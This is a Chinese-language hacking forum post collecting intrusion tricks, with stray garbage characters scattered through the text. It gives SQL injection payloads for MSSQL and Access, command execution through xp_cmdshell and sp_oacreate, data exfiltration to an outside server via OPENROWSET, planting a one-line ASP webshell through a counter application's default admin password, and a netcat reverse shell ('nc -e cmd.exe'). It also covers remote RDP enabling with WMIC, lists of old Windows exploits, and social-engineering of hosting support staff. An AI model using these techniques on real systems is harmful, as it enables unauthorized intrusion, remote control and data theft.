SA点数据库分离技术相关+ H4 q7 \ t7 ^7 k6 \
9 A7 X% f) N2 R
" t7 _2 o0 |" A3 ISA点数据库分离搞法+语句:
9 o3 j- {2 Y+ w" K2 J6 d- z6 i- X. s5 Q' n* z0 \4 ?
注射点不显错,执行下面三条语句页面都返回正常。
2 u: h1 I# g, |+ D( eand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
+ @+ e9 C) t# ?and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
1 N! f, Y6 d9 {, F; _. \( Aand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
9 Q& |" V% h. X# n. ]5 N6 b可以列目录,判断系统为2000,web与数据库分离
* m$ y/ H) |. {6 Y; {: o1 K6 ~遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。5 o- A5 B' U8 t4 J+ s
在注射点上执行
" F; F0 w4 B* B7 d0 Y' S- E/ G# V7 ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
+ t- F3 k! R% v3 d+ z* [; m页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP9 s: J/ X% N4 x7 k0 }9 g; k. z3 _# N
还有我用NC监听得其他端口都没有得到IP。
: n2 J- ^* ]% w
" {# I! P/ V. e& l: x7 `通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。. [0 w9 v8 |, t2 s
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases-- @. d, Q6 i8 E. B
% j4 ]7 W0 o* X+ b% F+ W;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--" F* S( ]" c. t$ |$ e' q/ z; c
& i5 U' \- [ M# D4 \, t( s
现在就猜想是不是数据库是内网而且不能连外网。
. g; E. \4 k9 q3 x8 U7 [4 |3 `
0 w* k7 j2 S$ Q w0 c8 e! [* x' P3 @9 ^. {. t
access导出txt文本代码
" U! p( m+ U6 `' NSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
* e9 X0 o, j9 n' i; m' v0 d U" O5 ]2 t4 [# Q6 k) u
+ s4 w; l6 s7 \6 P8 Q$ }
1 z ~2 ?/ _/ ?/ i9 u: R5 c* l" h自动跳转到指定网站代码头# N. p3 m7 c( v: X" g( x! `0 A
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>3 a: `9 s3 z% f0 P5 {
% W) g8 F0 y1 d" }8 u3 j8 M
) z/ x \& V3 ~, C
入侵java or jsp站点时默认配置文件路径:0 N; e3 p4 u3 w+ M
\web-inf\web.xml
# N0 M& F* ^6 ?0 ^& Otomcat下的配置文件位置:
$ T1 l1 R) i6 p. f+ f {\conf\server.xml (前面加上tomcat路径)
. e/ e, E7 V' `/ N\Tomcat 5.0\webapps\root\web-inf\struts-config.xml) M; y1 M: P5 _% q- G) c1 a
9 o6 H( j- Q+ E" a8 ?" |; O7 X8 T
9 u6 F& F! {# v/ d
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
& _- _3 i2 |5 k) T4 s-1%23
: f$ c. X( o6 H3 d* y> ; ^) e# K; V/ D" Y5 k
<
; A( {( c( Y9 J, `5 P( M1'+or+'1'='1
0 e y" N! U4 i+ pid=8%bf
9 {7 O: k$ |4 P
8 F; ]+ \: C9 o1 J全新注入点检测试法:
& c! T- L8 \" V7 S* p# P$ T( ]在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。' I. B3 L; W0 l
3 w, C% u# j U- Q
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。7 m3 o1 V' Q' E3 s" }3 }0 d
0 Q t4 F5 V: E# U' _搜索型注入判断方法:2 Z; ~- j7 \/ [: E
北京%' and '1'='1' and '%'='& {% Y) c$ h7 c- d! r) o
北京%' and '1'='2' and '%'='
/ |+ {- A9 n) w' @
5 M4 A, Q& u. x& v" ^, H8 {( f4 ^! U
2 V" I" n0 ^, ?3 R7 g! }" a2 W4 \' LCOOKIES注入:
1 R R9 k8 B' C$ |4 c+ k6 E! g
6 x* O6 a! |# n" g1 G/ njavascript:alert(document.cookie="id="+escape("51 and 1=1"));
: x/ k6 B4 y9 {2 e( I
& N; y0 u2 l* r' V+ J |( i2000专业版查看本地登录用户命令:1 p& m! ~3 Q3 V9 ^
net config workstation
, j$ a9 U0 N a+ [: K4 o9 W! j E* Y3 I/ F# {4 }: ~; E
, }, X, C; s8 q8 Y" k; ~, }2003下查看ipsec配置和默认防火墙配置命令:
3 R. N; i" F! [" G: ynetsh firewall show config
7 l$ w0 O. a3 o6 U0 N; \- Unetsh ipsec static show all
# c5 I. O8 [8 M8 S6 U0 S5 I( z# }) c6 y2 l, L4 ^1 S' J
不指派指定策略命令:
F2 M0 i2 E. w; T4 m! o qnetsh ipsec static set policy name=test assign=n (test是不指派的策略名)
! q! z3 N- U; \- dnetsh ipsec static show policy all 显示策略名! X7 H6 c7 C7 n2 C: Y; u
# c. ]7 F6 q- Q" a# T1 C# x3 l8 P9 o9 y7 t; P0 C6 p* X$ S6 ^1 j- n. x
猜管理员后台小技巧:
1 t$ F: Y- \) Dadmin/left.asp
, B$ }9 Z/ ^5 \7 |; H/ ]: X, wadmin/main.asp
% N+ h$ Y8 Q4 D8 Radmin/top.asp
# i, X8 L H# c* |: Q ?admin/admin.asp # z2 d5 ?9 g4 \2 L, l
会现出菜单导航,然后迅雷下载全部链接2 b( W) j& w3 L0 @$ W
4 J/ | s3 i3 A, \4 b- P5 F1 S3 I: M9 W( ]3 Q& p1 W1 I( O! t
社会工程学:
& L3 Z. k8 Y2 n1 a t用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人; r( |# T8 p1 M; s
然后去骗客服
1 b; g& h; W1 a0 p0 L. z/ u' ^% @0 k) p
) s2 ?- W! U6 n9 p& E. c
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 1 |) B3 V z: d8 Z
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, - e# ~! |2 t5 w, I- j
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
/ l2 u2 i! j8 P: o1 ]3 _2 u' ?2 t( \* R* F' U2 ?4 p( o& r& o0 w* ~3 @& o; s
* F) f7 ~. V; H7 c' s
$ K: U1 t* ]# ?- V! R5 t; U* S" o
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)0 a+ Z& S9 C8 I8 o4 }* O5 |
! q# h, U8 f/ ]) }# |6 u
* D( J2 @0 q, S- T( Y) j
% l( {% w$ i5 \; C* m" R0 m- dCMD加密注册表位置
/ w1 d, S/ ?9 l$ r(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor) v3 g5 H& v( x
AutoRun
3 x/ [2 X& c5 G% \8 Z2 B5 L" O9 }$ M: d$ n: K$ R: R# R
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
% B0 I9 m$ ~" e* @* T6 rAutoRun
$ b3 M# D% }* s6 i; [/ h# D, I" E% J, {; O
1 Y& e( r" c. _" S; D' D* o0 i在找注入时搜索Hidden,把他改成test8 u1 A$ @: F# k% ?5 C" Z# Z9 I2 _
3 u1 D+ ~1 k8 h* I
3 Y3 |5 Q5 e% J b3 H4 ~) ]* U# O
" B5 l2 E: q9 D
mstsc /v:IP /console
6 ]* z& i# E0 e" y6 O# i, n- V. W! c/ p
& ]$ k% v% V3 H. |5 ?4 ]
一句话开3389:
; T) P, e& X. {9 r& ~& L, h+ M8 H$ | V( w; m
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
3 B y* H) _" [: D: _5 J5 b开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
e, u- o" s5 E* Q8 N4 w1 v3 q" i# t$ v* B# k4 b
. L& O+ ~5 \( X* @+ H' k$ _( b知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
: @ H4 I* D( zInsert into admin(user,pwd) values('test','test')/ f1 m' M- Y+ X$ H" w) t) _
, N7 h3 i/ N1 C( H- i2 ]- e) r! @, ?) B' ~( p2 c6 w
NC反弹) y8 D: B9 @8 \# `% F7 O6 ]4 q- h
先在本机执行: nc -vv -lp 监听的端口 (自己执行) + J0 L- M( \% c& R
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)7 }- K0 g' Q' U- Y. K# I
~' _! R9 i Z. [3 D7 X" y* p
( |2 N8 d/ Z1 k! L- z+ v. |2 c6 ^
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题: i( m- @/ S* B+ a
6 T1 d# i# x9 m7 O7 E, r% a: T
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录! T5 ~/ e( b. ^9 e4 ?
例如:$ a4 ]1 S B/ `6 p, S" l! n
subst k: d:\www\ 用d盘www目录替代k盘2 u; K7 @1 P+ o
subst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对